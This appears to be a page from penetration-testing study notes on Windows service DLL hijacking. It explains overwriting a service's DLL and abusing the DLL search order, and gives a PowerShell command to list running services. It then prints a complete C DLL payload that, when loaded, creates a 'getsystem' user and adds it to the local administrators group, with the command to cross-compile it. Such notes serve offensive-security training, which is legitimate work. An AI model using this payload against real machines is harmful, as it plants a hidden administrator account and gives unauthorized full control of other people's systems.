Service DLL Hijacking

There are several methods we can use to exploit how DLLs work on Windows and they can often be an effective way of elevating our privileges. One method is similar to the privilege escalation vector performed in the previous section. Instead of overwriting the binary, we merely overwrite a DLL the service binary uses. However, the service may not work as expected because the actual DLL functionality is missing. In most cases, this would still lead us to code execution of the DLL’s code and then, for example, to the creation of a new local administrative user

Another method is to hijack the DLL search order. The search order is defined by Microsoft and determines what to inspect first when searching for DLLs. By default, all current Windows versions have safe DLL search mode enabled.

This setting was implemented by Microsoft due to the high number of DLL hijacking vectors and ensures that DLLs are more difficult to hijack. The following listing shows the standard search order taken from the Microsoft Documentation:

  1. The directory from which the application loaded.

  2. The system directory.

  3. The 16-bit system directory.

  4. The Windows directory.

  5. The current directory.

  6. The directories that are listed in the PATH environment variable.

To Search

PS C:\Users\Administrator> Get-CimInstance -ClassName win32_service | Select  Name,State,PathName | Where-Object {$_.State -like 'Running'}

Example Payload

#include <stdlib.h>
#include <windows.h>
BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
 switch ( ul_reason_for_call )
 {
 case DLL_PROCESS_ATTACH: // A process is loading the DLL.
 int i;
 i = system ("net user getsystem getsystem /add");
 i = system ("net localgroup administrators getsystem /add");
 break;
 case DLL_THREAD_ATTACH: // A process is creating a new thread.
 break;
 case DLL_THREAD_DETACH: // A thread exits normally.
 break;
 case DLL_PROCESS_DETACH: // A process unloads the DLL.
 break;
 }
 return TRUE;
}
kali@kali:~$ x86_64-w64-mingw32-gcc myDLL.cpp --shared -o myDLL.dll

PreviousService Binary HijackingNextUnquoted Service Paths

Last updated